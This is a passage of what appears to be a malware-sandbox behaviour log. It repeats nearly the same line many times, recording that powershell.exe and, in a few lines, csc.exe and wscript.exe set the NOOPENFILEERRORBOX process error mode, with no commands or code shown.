          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
